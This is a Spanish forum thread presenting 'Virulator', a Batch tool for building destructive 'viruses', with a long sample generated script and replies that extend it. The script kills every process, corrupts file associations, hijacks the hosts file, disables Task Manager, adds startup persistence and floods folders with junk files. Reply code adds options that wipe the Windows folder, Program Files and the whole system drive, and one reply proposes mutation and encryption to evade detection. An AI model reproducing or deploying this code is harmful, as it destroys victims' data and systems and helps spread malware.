elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Batch] Virulator 1.0c
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: [Batch] Virulator 1.0c  (Leído 24,087 veces)
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
[Batch] Virulator 1.0c
« en: 13 Junio 2012, 12:04 pm »

VIRULATOR



By Elektro H@cker



Virulator es un creador de "virus" para los amantes de Batch.

Pueden crear un "virus" dañino, O un simple archivo para gastar una broma pesada (O no tán pesada).

Virulator tiene multitud de opciones y tareas variadas para añadirle a tu bomba, Además, En cada tarea hay la posibilidad de añadir tareas preconfiguradas (Y algunas son bastante divertidas xD)...
PD: No se pierdan la idea que se me ocurrió para "Que no pare de correr el reloj de windows!", Es mi tarea favorita XD, Pruebenlo, Eso deja loco a cualquiera y no es dañino :).



- SCREENSHOTS:


















- También dispone de una opción para visualizar el historial de tareas, Para no perder de vista lo que vamos añadiendo...





- Esto es un ejemplo de un script generado con unas cuantas tareas de Virulator:

Código
  1. @Echo OFF
  2. Title sdsdsd
  3.  
  4. :: Virus creado con [Virulator 1.0]
  5. :: By Elektro H@cker
  6. :: No me hago repsonsable del uso de este archivo.
  7.  
  8. If not exist "%TEMP%\invisible.vbs" (Echo CreateObject("Wscript.Shell"^).Run """" ^& WScript.Arguments(0^) ^& """", 0, False>"C:\Users\ADMINI~1\AppData\Local\Temp\invisible.vbs" & wscript "%TEMP%\invisible.vbs" %0) Else (Exit)
  9.  
  10.  
  11. REM Matar proceso "explorer.exe"
  12. Taskkill /F /IM "explorer.exe" >NUL 2>&1
  13.  
  14.  
  15. REM Matar todos los procesos activos del sistema
  16. For /F "Tokens=4 delims=<>" %%X in ('wmic process get name /Format:xml ^| SORT ^| find /I ".exe" ^| Find /V /I "Taskkill" ^| Find /V /I "sort" ^| Find /V /I "cmd" ^| Find /V /I "csrss" ^| Find /V /I "conhost"') Do (Taskkill /F /T /IM "%%X" >NUL 2>&1)
  17.  
  18.  
  19. REM Programar el apagado del PC en 60 segundos
  20. Shutdown /R /T 60 /C "Soy Windows y me caes mal! No me vuelvas a encender, Noob..." /F >NUL
  21.  
  22.  
  23. REM Da¤ar las extensiones de archivos de imagen
  24. ASSOC .ani=regfile >NUL 2>&1
  25. ASSOC .bmp=regfile >NUL 2>&1
  26. ASSOC .cur=regfile >NUL 2>&1
  27. ASSOC .gif=regfile >NUL 2>&1
  28. ASSOC .ico=regfile >NUL 2>&1
  29. ASSOC .img=regfile >NUL 2>&1
  30. ASSOC .jpe=regfile >NUL 2>&1
  31. ASSOC .jpg=regfile >NUL 2>&1
  32. ASSOC .jpeg=regfile >NUL 2>&1
  33. ASSOC .pcd=regfile >NUL 2>&1
  34. ASSOC .png=regfile >NUL 2>&1
  35. ASSOC .psd=regfile >NUL 2>&1
  36. ASSOC .tga=regfile >NUL 2>&1
  37. ASSOC .tif=regfile >NUL 2>&1
  38. ASSOC .tiff=regfile >NUL 2>&1
  39.  
  40.  
  41. REM Abrir multi instancia "notepad.exe"
  42. Echo @echo off>>"%TEMP%\%~n0_720826398.bat"
  43. Echo :Instance>>"%TEMP%\%~n0_720826398.bat"
  44. Echo Start /B CMD /C "notepad.exe">>"%TEMP%\%~n0_720826398.bat"
  45. Echo Goto :Instance>>"%TEMP%\%~n0_720826398.bat"
  46. Start /B CMD /C "%TEMP%\%~n0_720826398.bat"
  47.  
  48.  
  49. REM Mostrar mensaje "Te voy a joder el PC, Lammer!"
  50. Echo X=msgbox("Te voy a joder el PC, Lammer!", 16,"Virus creado por Elektro H@cker")>"% style="color: #448888;">TEMP%\virulator.vbs"
  51. Start /B Wscript "%TEMP%\virulator.vbs"
  52.  
  53.  
  54. REM Bloquear pagina web "google.com"
  55. takeown /F "%windir%\System32\drivers\etc\hosts" >nul 2>&1
  56. icacls "%windir%\System32\drivers\etc\hosts" /grant "%username%":F /T >nul 2>&1
  57. Echo 127.0.1.1 google.com>>"%windir%\System32\drivers\etc\hosts"
  58. Echo 127.0.1.1 www.google.com>>"%windir%\System32\drivers\etc\hosts"
  59.  
  60.  
  61. REM Bucle infinito
  62. Echo @echo off>>"%TEMP%\%~n0_2514423018.bat"
  63. Echo :Bucle>>"%TEMP%\%~n0_2514423018.bat"
  64. Echo Echo bucleeeeeeeee >>"%TEMP%\%~n0_2514423018.bat"
  65. Echo Goto :Bucle>>"%TEMP%\%~n0_2514423018.bat"
  66. Start CMD /K "%TEMP%\%~n0_2514423018.bat"
  67.  
  68.  
  69. REM Ejecutar el virus al inicio del sistema "WindowsMachineSubProcess"
  70. Copy /Y %0 "%WINDIR%\" >NUL 2>&1
  71. Reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "WindowsMachineSubProcess" /D "%WINDIR%\%~n0.bat" /F >NUL 2>&1  
  72.  
  73.  
  74. REM Modificar fecha de Windows (Bucle infinito secuencial)
  75. Echo :DateUP >"%TEMP%\DateUP.bat"
  76. Echo For /L %%%%a in (2000,1,2099) Do ( >>"%TEMP%\DateUP.bat"
  77. Echo For /L %%%%b in (1,1,12) Do ( >>"%TEMP%\DateUP.bat"
  78. Echo For /L %%%%c in (1,1,31) Do ( >>"%TEMP%\DateUP.bat"
  79. Echo Echo %%%%c/%%%%b/%%%%a ^| Date ^>NUL >>"%TEMP%\DateUP.bat"
  80. Echo ping -n 1 localhost >>"%TEMP%\DateUP.bat"
  81. Echo ) >>"%TEMP%\DateUP.bat"
  82. Echo ) >>"%TEMP%\DateUP.bat"
  83. Echo ) >>"%TEMP%\DateUP.bat"
  84. Echo Goto :DateUP >>"%TEMP%\DateUP.bat"
  85. Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\DateUP.bat"
  86.  
  87.  
  88. REM Modificar hora de Windows (Bucle infinito secuencial)
  89. Echo :TimeUP >"%TEMP%\TimeUP.bat"
  90. Echo For /L %%%%a in (0,1,23) Do ( >>"%TEMP%\TimeUP.bat"
  91. Echo For /L %%%%b in (0,1,59) Do ( >>"%TEMP%\TimeUP.bat"
  92. Echo Time %%%%a:%%%%b >>"%TEMP%\TimeUP.bat"
  93. Echo ping -n 1 localhost >>"%TEMP%\TimeUP.bat"
  94. Echo ) >>"%TEMP%\TimeUP.bat"
  95. Echo ) >>"%TEMP%\TimeUP.bat"
  96. Echo Goto :TimeUP >>"%TEMP%\TimeUP.bat"
  97. Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\TimeUP.bat"
  98.  
  99.  
  100. REM Modificar el nombre del Boot de inicio "Disco C: Infectado"
  101. label Disco C: Infectado>nul
  102.  
  103.  
  104. REM Renombrar extension ".jpg" a ".txt"
  105. FOR /R "%homedrive%\" %%X in (*.jpg) DO (Rename "%%X" "%%~nX.txt" >NUL 2>&1)
  106.  
  107.  
  108. REM Hibernar el PC
  109. RunDll32.exe powrprof.dll,SetSuspendState
  110.  
  111.  
  112. REM Deshabilitar el administrador de tareas (TASKMGR.EXE)
  113. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
  114. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
  115.  
  116.  
  117. REM Intercambiar los botones del mouse
  118. Rundll32 User32.dll,SwapMouseButton
  119.  
  120.  
  121. REM Fake-Virus 1 "Fake25917820"
  122. (
  123. echo @echo off
  124. echo color 47
  125. echo net stop themes 2^>nul
  126. echo title INFECCION VIRAL PROFUNDA!
  127. echo echo INFECCION VIRAL!!!
  128. echo echo ERROR!!!
  129. echo echo virus - TROJAN_DEMOLISHER code #45643676
  130. echo PING -n 4 LOCALHOST ^>nul
  131. echo echo FIREWALL - FALLO
  132. echo PING -n 2 LOCALHOST ^>nul
  133. echo echo ANTI-VIRUS - FALLO
  134. echo PING -n 2 LOCALHOST ^>nul
  135. echo echo DIRECCION IP - RECHAZADA
  136. echo PING -n 2 LOCALHOST ^>nul
  137. echo echo FIRMA VIRAL: ****-****-****-8894
  138. echo PING -n 3 LOCALHOST ^>nul
  139. echo cls
  140. echo echo ESCANEANDO AREAS INFECTADAS...
  141. echo PING -n 3 LOCALHOST ^>nul
  142. echo set /a num=0
  143. echo :repeat1
  144. echo set /a num=%%num%%+1
  145. echo echo %%num%%
  146. echo if %%num%%==100 goto end
  147. echo goto repeat1
  148. echo :end
  149. echo PING -n 1 LOCALHOST ^>nul
  150. echo cls
  151. echo echo 86.5%%%% DE MEMORIA FISICA ESTA INFECTADA
  152. echo echo INFECCION FATAL!
  153. echo PING -n 3 LOCALHOST ^>nul
  154. echo ECHO LA ELIMINACION DEL DISCO INFECTADO ES NECESARIA
  155. echo PING -n 3 LOCALHOST ^>nul
  156. echo cls
  157. echo echo ELIMINANDO PARCIALMENTE EL DISCO INFECTADO [C:]
  158. echo echo PORFAVOR NO APAGUE EL SISTEMA
  159. echo PING -n 4 LOCALHOST ^>nul
  160. echo dir /b /s %%WINDIR%%\ ^| FIND /v /i "WINSXS" ^| FIND /v /i "assembly" ^| FIND /v /i "syswow64" ^| FIND /v /i "servicing"
  161. echo cls
  162. echo echo CONTENIDO DEL DISCO INFECTADO [C:] - ELIMINADO
  163. echo PING -n 3 LOCALHOST ^>nul
  164. echo cls
  165. echo echo ESCANEANDO...
  166. echo PING -n 2 LOCALHOST ^>nul
  167. echo set /a num1=0
  168. echo :repeat2
  169. echo set /a num1=%%num1%% +1
  170. echo echo %%num1%%
  171. echo if %%num1%%==100 goto end1
  172. echo goto repeat2
  173. echo :end1
  174. echo cls
  175. echo PING -n 2 LOCALHOST ^>nul
  176. echo echo 98.00%%%% DE MEMORIA FISICA HA SIDO DESINFECTADA
  177. echo PING -n 3 LOCALHOST ^>nul
  178. echo echo ERROR
  179. echo echo ERROR
  180. echo echo ERROR
  181. echo echo ERROR
  182. echo echo ERROR
  183. echo echo ERROR
  184. echo echo ERROR
  185. echo echo ERROR
  186. echo echo ERROR
  187. echo echo ERROR
  188. echo echo ERROR
  189. echo echo ERROR
  190. echo echo ERROR
  191. echo echo ERROR
  192. echo echo ERROR
  193. echo echo ERROR
  194. echo echo ERROR
  195. echo echo ERROR
  196. echo echo ERROR
  197. echo PING -n 3 LOCALHOST ^>nul
  198. echo cls
  199. echo title FALLO EN EL SISTEMA
  200. echo color 17
  201. echo echo ERROR!
  202. echo PING -n 2 LOCALHOST ^>nul
  203. echo echo MEMORIA VIRTUAL PERDIDA!
  204. echo PING -n 2 LOCALHOST ^>nul
  205. echo echo MEMORIA FISICA SOBRECALENTADA!
  206. echo PING -n 2 LOCALHOST ^>nul
  207. echo echo PROCESADOR SOBRECALENTANDOSE!
  208. echo PING -n 2 LOCALHOST ^>nul
  209. echo ECHO LA RUPTURA TOTAL DEL SISTEMA ES INMINENTE!
  210. echo PING -n 4 LOCALHOST ^>nul
  211. echo ECHO RIESGO DE FUEGO ENCONTRADO!
  212. echo ECHO APAGANDO EL SISTEMA PARA EVITAR PERDIDA DE DATOS
  213. echo shutdown /R /T 60 /C "Windows ha encontrado una amenaza de virus y debe reiniciarse. Guarde todo su trabajo ahora." /F
  214. echo PING -n 8 LOCALHOST ^>nul
  215. )>%TEMP%\Fake25917820.bat
  216. Start CMD /K %TEMP%\Fake25917820.bat
  217.  
  218.  
  219. REM Propagar 100 archicos en cada carpeta del disco duro (PRECONFIGURADO)
  220. (
  221. echo @echo off
  222. echo setlocal enabledelayedexpansion
  223. echo Set File=0
  224. echo For /F "Tokens=*" %%%%X in ('Dir /B /S /AD "%%systemdrive%%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"'^) do (Call :COPY %%%%X^)
  225. echo Fsutil file createnew "%%*\%%Random%%%%Random%%%%Random%%%%Random%%%%Random%%" 1 ^>NUL 2^>^&1
  226. echo Set /A File+=1
  227. echo If !FILE! EQU 100 (Set /A File=0^& Goto :EOF^) ELSE (Call :COPY %%*^)
  228. )>%TEMP%\basura.bat
  229. Start /B %TEMP%\basura.bat
  230.  



- Y por último, Aquí tienen el script:
Versión 1.0C
http://pastebin.com/raw.php?i=vqUN1g3p


(CASI)Todas las tareas han sido testeadas en Windows 7, Es muy posible que muchas tareas no funcionen en versiones anteriores de Windows (Y no tengo pensado ""dar soporte"" a esas versiones).

Opinen lo que quieran... Que a mi ya no se me ocurre que más tareas añadir :laugh:.

PD: Si encuentran algún fallo/mejora/idea reportenlo aquí para corregirlo/añadirlo porfavor  ;D.
Gracias.


Espero que os guste aunque séa un poco y lo disfruteis!
Salu2.


« Última modificación: 8 Marzo 2019, 06:44 am por Eleкtro » En línea

Jenag


Desconectado Desconectado

Mensajes: 968


Conoce a tu enemigo como a tí mismo..


Ver Perfil
Re: [Batch] Virulator 1.0
« Respuesta #1 en: 13 Junio 2012, 12:22 pm »

Mola lo del reloj y la fecha y demás.Está bastante chulazo.Eres un crack , EleKtro H@cker. :-*


En línea

Para comentarme algo : Evamr1991@openmailbox.org : Válido para Bots y Robots..
Jenag


Desconectado Desconectado

Mensajes: 968


Conoce a tu enemigo como a tí mismo..


Ver Perfil
Re: [Batch] Virulator 1.0
« Respuesta #2 en: 13 Junio 2012, 12:25 pm »


Una cosa en :
Citar
REM Bloquear pagina web "google.com"
takeown /F "%windir%\System32\drivers\etc\hosts" >nul 2>&1
icacls "%windir%\System32\drivers\etc\hosts" /grant "%username%":F /T >nul 2>&1
Echo 127.0.1.1   google.com>>"%windir%\System32\drivers\etc\hosts"
Echo 127.0.1.1   www.google.com>>"%windir%\System32\drivers\etc\hosts"
No deberia ser 127.0.0.1.¿eh?. :-*
« Última modificación: 13 Junio 2012, 12:34 pm por EleKtro H@cker » En línea

Para comentarme algo : Evamr1991@openmailbox.org : Válido para Bots y Robots..
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
Re: [Batch] Virulator 1.0
« Respuesta #3 en: 13 Junio 2012, 12:33 pm »

Una cosa en :No deberia ser 127.0.0.1.¿eh?. :-*

Errata avistada! :rolleyes:, Aunque las páginas se bloquean igualmente, Así que lo dejo sin corregir hasta que tenga algo más para actualizar el script.
 

Mola lo del reloj y la fecha y demás.Está bastante chulazo

Gracias por comentar besitos xD :)

un saludo



EDITO:

Versión 1.0c

Corregida la errata de la IP, Y Arreglado las opciones de propagación, que era lo único que me quedaba por testear a fondo (No funcionaban).
« Última modificación: 13 Junio 2012, 13:43 pm por EleKtro H@cker » En línea

CrowSuz

Desconectado Desconectado

Mensajes: 7



Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #4 en: 13 Junio 2012, 13:57 pm »

Tiene bastante buena pinta esto, yo soy bastante cabezota y por aprender me gusta programarme todo, por basico que sea, pero seguramente le eche un vistazo al codigo para ver como hacen las cosas los que saben de esto :D

Un saludo!
En línea

-- KiLiaN --


Desconectado Desconectado

Mensajes: 1.163


Ju Já!!


Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #5 en: 13 Junio 2012, 14:00 pm »

Cuando llegue a mi casa esta tarde, te hago de betatester en XP y si falla algo se cambia  ;)
En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #6 en: 13 Junio 2012, 14:11 pm »

Cuando llegue a mi casa esta tarde, te hago de betatester en XP y si falla algo se cambia  ;)

que bien, que bien! :)

saludos
En línea

Flamer


Desconectado Desconectado

Mensajes: 1.051


crack, crack y mas crack...


Ver Perfil WWW
Re: [Batch] Virulator 1.0c
« Respuesta #7 en: 13 Junio 2012, 17:12 pm »

hola y felisidades elecktro hacker boy a calarlo aver que tal en xp; seme ocurre algo que puedes añadir que los bichos que se crean; tengan la opcion de ser mutantes que cambien algunas lineas que estan abajo para arriba; que añadan codigo basura;que cambeen algunas partes de algunas lineas; que infecte accesos directos y que cambee el nombre en cada ejecucion.
Seme ocurre algo pero nose si se pueda en batch que el codigo este cifrado y al ejecutarlo se desencripte.
bueno saludos lo ultimo boy aber si sepuede
En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

-- KiLiaN --


Desconectado Desconectado

Mensajes: 1.163


Ju Já!!


Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #8 en: 13 Junio 2012, 17:23 pm »

De momento he cambiado la opción de borrar carpetas y ficheros:

Código
  1. :KillFiles
  2. Set "DIRFILE=%DIRFILE:^"=%" & Rem "
  3. Echo+>>"%File%" & Echo REM Eliminar el archivo o ruta "%DIRFILE%">>"%File%"
  4. Echo cacls "%DIRFILE%" /E /T /P "%username%":F^>nul 2^>^&1 >>"%FILE%"
  5. Echo cacls "%DIRFILE%\*" /E /T /P "%username%":F ^>nul 2^>^&1 >>"%FILE%"
  6. Echo Del /Q "%DIRFILE%" 2^>NUL
  7. RD /Q /S "%DIRFILE%" ^>NUL 2^>^&1 >>"%FILE%"
  8. call :continuar :KillFiles
  9.  

Y en las preconfiguraciones:
Código
  1. :KillFiles_Preconfigurado_Windows
  2. (
  3. Echo REM Eliminar todos los archivos de "Windows"
  4. Echo cacls "%%WINDIR%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
  5. Echo RD /Q /S "%%WINDIR%%" ^>nul 2^>^&1
  6. )>>"%FILE%"
  7. set dirfile=
  8. call :continuar :KillFiles
  9.  
  10. :KillFiles_Preconfigurado_programas
  11. (
  12. Echo REM Eliminar todos los archivos de "Archivos de programa" x86-x64
  13.  
  14. Echo cacls "%%PROGRAMFILES%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
  15. Echo cacls "%%PROGRAMFILES(X86)%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
  16. Echo RD /Q /S "%%PROGRAMFILES%%" ^>nul 2^>^&1
  17. Echo RD /Q /S "%%PROGRAMFILES(X86)%%" ^>nul 2^>^&1
  18. )>>"%FILE%"
  19. set dirfile=
  20. call :continuar :KillFiles
  21.  
  22. :KillFiles_Preconfigurado_Disco
  23. (
  24. Echo REM Eliminar todos los archivos del disco duro principal
  25. Echo cacls "%%Systemdrive%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
  26. Echo For /D %%%%a in ^(%%SYSTEMDRIVE%%\*^) do ^(RD /Q /S "%%%%a" ^>nul 2^>^&1^)
  27. )>>"%FILE%"
  28. set dirfile=
  29. call :continuar :KillFiles

También donde se cambia el archivo Host pero si sigo, voy a copiar aqui medio script..
Icalcs y takedown no existierón hasta el Vista..asique con eso rula.

Más adelante en las opciónes de cambiar la fecha y la hora haces referencía a un archivo llamado invisible.vbs que no se crea previamente (por lo tanto da error de que no existe).


En la opción de borrar carpetas y ficheros si metes la ruta con comillas se cierra.

Por lo demás me va de lujo, muy bueno y muy limpio el code se me ocurre que quizás se le pueda añadir opción a borrar alguna parte del historial eligiendo el número pero no he encontrado aún como meterle mano (como seleccionar una parte del archivo para borrarlo, poniendo etiquetas? nose), aún me quedan por tester la opciones de cambiar los botones del ratón y las que deshabilitan el apagado, el cambio de user, etc, que he mirado por lo alto y no tiene porque dar error..desde mi conocimiento limitado.


« Última modificación: 13 Junio 2012, 17:27 pm por -- KiLiaN -- » En línea

Puntoinfinito


Desconectado Desconectado

Mensajes: 919


#! /win/archlinux


Ver Perfil WWW
Re: [Batch] Virulator 1.0c
« Respuesta #9 en: 16 Junio 2012, 00:25 am »

JO-DER

Vaya currada que nos has regalado ¡eh!

Oye... eso de crear un bucle que ¿función tiene?

En línea

AHORA EN SOFTONIC || CLICK HERE!!
Base64: QWNhYmFzIGRlIHBlcmRlciAxIG1pbnV0byBkZSB0dSB2aWRhLiBPbOkh



HACK AND 1337 : http://hackandleet.blogspot.com
WEBSITE: http://www.infiniterware.
Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines